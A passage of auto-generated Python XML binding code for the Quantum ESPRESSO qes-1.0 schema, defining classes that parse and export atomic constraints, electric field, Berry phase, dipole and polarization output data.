elif nodeName_ == 'relaxz':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'relaxz')
self.relaxz = ival_
elif nodeName_ == 'block':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'block')
self.block = ival_
elif nodeName_ == 'block_1' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'block_1')
self.block_1 = fval_
elif nodeName_ == 'block_2' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'block_2')
self.block_2 = fval_
elif nodeName_ == 'block_height' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'block_height')
self.block_height = fval_
# end class gate_settingsType
class atomic_constraintsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, num_of_constraints=None, tolerance=None, atomic_constraint=None):
self.original_tagname_ = None
self.num_of_constraints = num_of_constraints
self.tolerance = tolerance
if atomic_constraint is None:
self.atomic_constraint = []
else:
self.atomic_constraint = atomic_constraint
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, atomic_constraintsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if atomic_constraintsType.subclass:
return atomic_constraintsType.subclass(*args_, **kwargs_)
else:
return atomic_constraintsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_num_of_constraints(self): return self.num_of_constraints
def set_num_of_constraints(self, num_of_constraints): self.num_of_constraints = num_of_constraints
def get_tolerance(self): return self.tolerance
def set_tolerance(self, tolerance): self.tolerance = tolerance
def get_atomic_constraint(self): return self.atomic_constraint
def set_atomic_constraint(self, atomic_constraint): self.atomic_constraint = atomic_constraint
def add_atomic_constraint(self, value): self.atomic_constraint.append(value)
def insert_atomic_constraint_at(self, index, value): self.atomic_constraint.insert(index, value)
def replace_atomic_constraint_at(self, index, value): self.atomic_constraint[index] = value
def hasContent_(self):
if (
self.num_of_constraints is not None or
self.tolerance is not None or
self.atomic_constraint
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_constraintsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomic_constraintsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_constraintsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_constraintsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_constraintsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_constraintsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.num_of_constraints is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:num_of_constraints>%s</qes:num_of_constraints>%s' % (self.gds_format_integer(self.num_of_constraints, input_name='num_of_constraints'), eol_))
if self.tolerance is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:tolerance>%s</qes:tolerance>%s' % (self.gds_format_double(self.tolerance, input_name='tolerance'), eol_))
for atomic_constraint_ in self.atomic_constraint:
atomic_constraint_.export(outfile, level, namespaceprefix_, name_='atomic_constraint', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'num_of_constraints' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'num_of_constraints')
self.num_of_constraints = ival_
elif nodeName_ == 'tolerance' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'tolerance')
self.tolerance = fval_
elif nodeName_ == 'atomic_constraint':
obj_ = atomic_constraintType.factory()
obj_.build(child_)
self.atomic_constraint.append(obj_)
obj_.original_tagname_ = 'atomic_constraint'
# end class atomic_constraintsType
class atomic_constraintType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, constr_parms=None, constr_type=None, constr_target=None):
self.original_tagname_ = None
self.constr_parms = constr_parms
self.validate_constr_parms_listType(self.constr_parms)
self.constr_type = constr_type
self.validate_constr_typeType(self.constr_type)
self.constr_target = constr_target
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, atomic_constraintType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if atomic_constraintType.subclass:
return atomic_constraintType.subclass(*args_, **kwargs_)
else:
return atomic_constraintType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_constr_parms(self): return self.constr_parms
def set_constr_parms(self, constr_parms): self.constr_parms = constr_parms
def get_constr_type(self): return self.constr_type
def set_constr_type(self, constr_type): self.constr_type = constr_type
def get_constr_target(self): return self.constr_target
def set_constr_target(self, constr_target): self.constr_target = constr_target
def validate_constr_parms_listType(self, value):
# Validate type constr_parms_listType, a restriction on double.
if value is not None and Validate_simpletypes_:
if len(str(value)) != 4:
warnings_.warn('Value "%(value)s" does not match xsd length restriction on constr_parms_listType' % {"value" : value} )
def validate_constr_typeType(self, value):
# Validate type constr_typeType, a restriction on string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['type_coord', 'atom_coord', 'distance', 'planar_angle', 'torsional_angle', 'bennet_proj']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on constr_typeType' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.constr_parms is not None or
self.constr_type is not None or
self.constr_target is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_constraintType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomic_constraintType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_constraintType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_constraintType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_constraintType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_constraintType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.constr_parms is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:constr_parms>%s</qes:constr_parms>%s' % (self.gds_format_double_list(self.constr_parms, input_name='constr_parms'), eol_))
if self.constr_type is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:constr_type>%s</qes:constr_type>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.constr_type), input_name='constr_type')), eol_))
if self.constr_target is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:constr_target>%s</qes:constr_target>%s' % (self.gds_format_double(self.constr_target, input_name='constr_target'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'constr_parms':
constr_parms_ = child_.text
constr_parms_ = self.gds_validate_double_list(constr_parms_, node, 'constr_parms')
self.constr_parms = constr_parms_
# validate type constr_parms_listType
self.validate_constr_parms_listType(self.constr_parms)
elif nodeName_ == 'constr_type':
constr_type_ = child_.text
constr_type_ = self.gds_validate_string(constr_type_, node, 'constr_type')
self.constr_type = constr_type_
# validate type constr_typeType
self.validate_constr_typeType(self.constr_type)
elif nodeName_ == 'constr_target' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'constr_target')
self.constr_target = fval_
# end class atomic_constraintType
class outputElectricFieldType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, BerryPhase=None, finiteElectricFieldInfo=None, dipoleInfo=None, gateInfo=None):
self.original_tagname_ = None
self.BerryPhase = BerryPhase
self.finiteElectricFieldInfo = finiteElectricFieldInfo
self.dipoleInfo = dipoleInfo
self.gateInfo = gateInfo
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, outputElectricFieldType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if outputElectricFieldType.subclass:
return outputElectricFieldType.subclass(*args_, **kwargs_)
else:
return outputElectricFieldType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_BerryPhase(self): return self.BerryPhase
def set_BerryPhase(self, BerryPhase): self.BerryPhase = BerryPhase
def get_finiteElectricFieldInfo(self): return self.finiteElectricFieldInfo
def set_finiteElectricFieldInfo(self, finiteElectricFieldInfo): self.finiteElectricFieldInfo = finiteElectricFieldInfo
def get_dipoleInfo(self): return self.dipoleInfo
def set_dipoleInfo(self, dipoleInfo): self.dipoleInfo = dipoleInfo
def get_gateInfo(self): return self.gateInfo
def set_gateInfo(self, gateInfo): self.gateInfo = gateInfo
def hasContent_(self):
if (
self.BerryPhase is not None or
self.finiteElectricFieldInfo is not None or
self.dipoleInfo is not None or
self.gateInfo is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='outputElectricFieldType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('outputElectricFieldType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='outputElectricFieldType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='outputElectricFieldType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='outputElectricFieldType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='outputElectricFieldType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.BerryPhase is not None:
self.BerryPhase.export(outfile, level, namespaceprefix_, name_='BerryPhase', pretty_print=pretty_print)
if self.finiteElectricFieldInfo is not None:
self.finiteElectricFieldInfo.export(outfile, level, namespaceprefix_, name_='finiteElectricFieldInfo', pretty_print=pretty_print)
if self.dipoleInfo is not None:
self.dipoleInfo.export(outfile, level, namespaceprefix_, name_='dipoleInfo', pretty_print=pretty_print)
if self.gateInfo is not None:
self.gateInfo.export(outfile, level, namespaceprefix_, name_='gateInfo', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'BerryPhase':
obj_ = BerryPhaseOutputType.factory()
obj_.build(child_)
self.BerryPhase = obj_
obj_.original_tagname_ = 'BerryPhase'
elif nodeName_ == 'finiteElectricFieldInfo':
obj_ = finiteFieldOutType.factory()
obj_.build(child_)
self.finiteElectricFieldInfo = obj_
obj_.original_tagname_ = 'finiteElectricFieldInfo'
elif nodeName_ == 'dipoleInfo':
obj_ = dipoleOutputType.factory()
obj_.build(child_)
self.dipoleInfo = obj_
obj_.original_tagname_ = 'dipoleInfo'
elif nodeName_ == 'gateInfo':
obj_ = gateInfoType.factory()
obj_.build(child_)
self.gateInfo = obj_
obj_.original_tagname_ = 'gateInfo'
# end class outputElectricFieldType
class BerryPhaseOutputType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, totalPolarization=None, totalPhase=None, ionicPolarization=None, electronicPolarization=None):
self.original_tagname_ = None
self.totalPolarization = totalPolarization
self.totalPhase = totalPhase
if ionicPolarization is None:
self.ionicPolarization = []
else:
self.ionicPolarization = ionicPolarization
if electronicPolarization is None:
self.electronicPolarization = []
else:
self.electronicPolarization = electronicPolarization
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, BerryPhaseOutputType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if BerryPhaseOutputType.subclass:
return BerryPhaseOutputType.subclass(*args_, **kwargs_)
else:
return BerryPhaseOutputType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_totalPolarization(self): return self.totalPolarization
def set_totalPolarization(self, totalPolarization): self.totalPolarization = totalPolarization
def get_totalPhase(self): return self.totalPhase
def set_totalPhase(self, totalPhase): self.totalPhase = totalPhase
def get_ionicPolarization(self): return self.ionicPolarization
def set_ionicPolarization(self, ionicPolarization): self.ionicPolarization = ionicPolarization
def add_ionicPolarization(self, value): self.ionicPolarization.append(value)
def insert_ionicPolarization_at(self, index, value): self.ionicPolarization.insert(index, value)
def replace_ionicPolarization_at(self, index, value): self.ionicPolarization[index] = value
def get_electronicPolarization(self): return self.electronicPolarization
def set_electronicPolarization(self, electronicPolarization): self.electronicPolarization = electronicPolarization
def add_electronicPolarization(self, value): self.electronicPolarization.append(value)
def insert_electronicPolarization_at(self, index, value): self.electronicPolarization.insert(index, value)
def replace_electronicPolarization_at(self, index, value): self.electronicPolarization[index] = value
def hasContent_(self):
if (
self.totalPolarization is not None or
self.totalPhase is not None or
self.ionicPolarization or
self.electronicPolarization
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='BerryPhaseOutputType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('BerryPhaseOutputType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='BerryPhaseOutputType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='BerryPhaseOutputType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='BerryPhaseOutputType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='BerryPhaseOutputType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.totalPolarization is not None:
self.totalPolarization.export(outfile, level, namespaceprefix_, name_='totalPolarization', pretty_print=pretty_print)
if self.totalPhase is not None:
self.totalPhase.export(outfile, level, namespaceprefix_, name_='totalPhase', pretty_print=pretty_print)
for ionicPolarization_ in self.ionicPolarization:
ionicPolarization_.export(outfile, level, namespaceprefix_, name_='ionicPolarization', pretty_print=pretty_print)
for electronicPolarization_ in self.electronicPolarization:
electronicPolarization_.export(outfile, level, namespaceprefix_, name_='electronicPolarization', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'totalPolarization':
obj_ = polarizationType.factory()
obj_.build(child_)
self.totalPolarization = obj_
obj_.original_tagname_ = 'totalPolarization'
elif nodeName_ == 'totalPhase':
obj_ = phaseType.factory()
obj_.build(child_)
self.totalPhase = obj_
obj_.original_tagname_ = 'totalPhase'
elif nodeName_ == 'ionicPolarization':
obj_ = ionicPolarizationType.factory()
obj_.build(child_)
self.ionicPolarization.append(obj_)
obj_.original_tagname_ = 'ionicPolarization'
elif nodeName_ == 'electronicPolarization':
obj_ = electronicPolarizationType.factory()
obj_.build(child_)
self.electronicPolarization.append(obj_)
obj_.original_tagname_ = 'electronicPolarization'
# end class BerryPhaseOutputType
class dipoleOutputType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, idir=None, dipole=None, ion_dipole=None, elec_dipole=None, dipoleField=None, potentialAmp=None, totalLength=None):
self.original_tagname_ = None
self.idir = idir
self.dipole = dipole
self.ion_dipole = ion_dipole
self.elec_dipole = elec_dipole
self.dipoleField = dipoleField
self.potentialAmp = potentialAmp
self.totalLength = totalLength
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, dipoleOutputType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if dipoleOutputType.subclass:
return dipoleOutputType.subclass(*args_, **kwargs_)
else:
return dipoleOutputType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_idir(self): return self.idir
def set_idir(self, idir): self.idir = idir
def get_dipole(self): return self.dipole
def set_dipole(self, dipole): self.dipole = dipole
def get_ion_dipole(self): return self.ion_dipole
def set_ion_dipole(self, ion_dipole): self.ion_dipole = ion_dipole
def get_elec_dipole(self): return self.elec_dipole
def set_elec_dipole(self, elec_dipole): self.elec_dipole = elec_dipole
def get_dipoleField(self): return self.dipoleField
def set_dipoleField(self, dipoleField): self.dipoleField = dipoleField
def get_potentialAmp(self): return self.potentialAmp
def set_potentialAmp(self, potentialAmp): self.potentialAmp = potentialAmp
def get_totalLength(self): return self.totalLength
def set_totalLength(self, totalLength): self.totalLength = totalLength
def hasContent_(self):
if (
self.idir is not None or
self.dipole is not None or
self.ion_dipole is not None or
self.elec_dipole is not None or
self.dipoleField is not None or
self.potentialAmp is not None or
self.totalLength is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='dipoleOutputType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('dipoleOutputType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='dipoleOutputType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='dipoleOutputType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='dipoleOutputType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='dipoleOutputType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.idir is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:idir>%s</qes:idir>%s' % (self.gds_format_integer(self.idir, input_name='idir'), eol_))
if self.dipole is not None:
self.dipole.export(outfile, level, namespaceprefix_, name_='dipole', pretty_print=pretty_print)
if self.ion_dipole is not None:
self.ion_dipole.export(outfile, level, namespaceprefix_, name_='ion_dipole', pretty_print=pretty_print)
if self.elec_dipole is not None:
self.elec_dipole.export(outfile, level, namespaceprefix_, name_='elec_dipole', pretty_print=pretty_print)
if self.dipoleField is not None:
self.dipoleField.export(outfile, level, namespaceprefix_, name_='dipoleField', pretty_print=pretty_print)
if self.potentialAmp is not None:
self.potentialAmp.export(outfile, level, namespaceprefix_, name_='potentialAmp', pretty_print=pretty_print)
if self.totalLength is not None:
self.totalLength.export(outfile, level, namespaceprefix_, name_='totalLength', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'idir' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'idir')
self.idir = ival_
elif nodeName_ == 'dipole':
obj_ = scalarQuantityType.factory()
obj_.build(child_)
self.dipole = obj_
obj_.original_tagname_ = 'dipole'
elif nodeName_ == 'ion_dipole':
obj_ = scalarQuantityType.factory()
obj_.build(child_)
self.ion_dipole = obj_
obj_.original_tagname_ = 'ion_dipole'
elif nodeName_ == 'elec_dipole':
obj_ = scalarQuantityType.factory()
obj_.build(child_)
self.elec_dipole = obj_
obj_.original_tagname_ = 'elec_dipole'
elif nodeName_ == 'dipoleField':
obj_ = scalarQuantityType.factory()
obj_.build(child_)
self.dipoleField = obj_
obj_.original_tagname_ = 'dipoleField'
elif nodeName_ == 'potentialAmp':
obj_ = scalarQuantityType.factory()
obj_.build(child_)
self.potentialAmp = obj_
obj_.original_tagname_ = 'potentialAmp'
elif nodeName_ == 'totalLength':
obj_ = scalarQuantityType.factory()
obj_.build(child_)
self.totalLength = obj_
obj_.original_tagname_ = 'totalLength'
# end class dipoleOutputType
class finiteFieldOutType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, electronicDipole=None, ionicDipole=None):
self.original_tagname_ = None
self.electronicDipole = electronicDipole
self.validate_d3vectorType(self.electronicDipole)
self.ionicDipole = ionicDipole
self.validate_d3vectorType(self.ionicDipole)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, finiteFieldOutType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if finiteFieldOutType.subclass:
return finiteFieldOutType.subclass(*args_, **kwargs_)
else:
return finiteFieldOutType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_electronicDipole(self): return self.electronicDipole
def set_electronicDipole(self, electronicDipole): self.electronicDipole = electronicDipole
def get_ionicDipole(self): return self.ionicDipole
def set_ionicDipole(self, ionicDipole): self.ionicDipole = ionicDipole
def validate_d3vectorType(self, value):
# Validate type d3vectorType, a restriction on double.
if value is not None and Validate_simpletypes_:
if len(str(value)) != 3:
warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
def hasContent_(self):
if (
self.electronicDipole is not None or
self.ionicDipole is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='finiteFieldOutType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('finiteFieldOutType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='finiteFieldOutType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='finiteFieldOutType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='finiteFieldOutType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='finiteFieldOutType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.electronicDipole is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:electronicDipole>%s</qes:electronicDipole>%s' % (self.gds_format_double_list(self.electronicDipole, input_name='electronicDipole'), eol_))
if self.ionicDipole is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ionicDipole>%s</qes:ionicDipole>%s' % (self.gds_format_double_list(self.ionicDipole, input_name='ionicDipole'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'electronicDipole':
electronicDipole_ = child_.text
electronicDipole_ = self.gds_validate_double_list(electronicDipole_, node, 'electronicDipole')
self.electronicDipole = electronicDipole_
# validate type d3vectorType
self.validate_d3vectorType(self.electronicDipole)
elif nodeName_ == 'ionicDipole':
ionicDipole_ = child_.text
ionicDipole_ = self.gds_validate_double_list(ionicDipole_, node, 'ionicDipole')
self.ionicDipole = ionicDipole_
# validate type d3vectorType
self.validate_d3vectorType(self.ionicDipole)
# end class finiteFieldOutType
class polarizationType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, polarization=None, modulus=None, direction=None):
self.original_tagname_ = None
self.polarization = polarization
self.modulus = modulus
self.direction = direction
self.validate_d3vectorType(self.direction)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, polarizationType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if polarizationType.subclass:
return polarizationType.subclass(*args_, **kwargs_)
else:
return polarizationType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_polarization(self): return self.polarization
def set_polarization(self, polarization): self.polarization = polarization
def get_modulus(self): return self.modulus
def set_modulus(self, modulus): self.modulus = modulus
def get_direction(self): return self.direction
def set_direction(self, direction): self.direction = direction
def validate_d3vectorType(self, value):
# Validate type d3vectorType, a restriction on double.
if value is not None and Validate_simpletypes_:
if len(str(value)) != 3:
warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
def hasContent_(self):
if (
self.polarization is not None or
self.modulus is not None or
self.direction is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='polarizationType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('polarizationType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
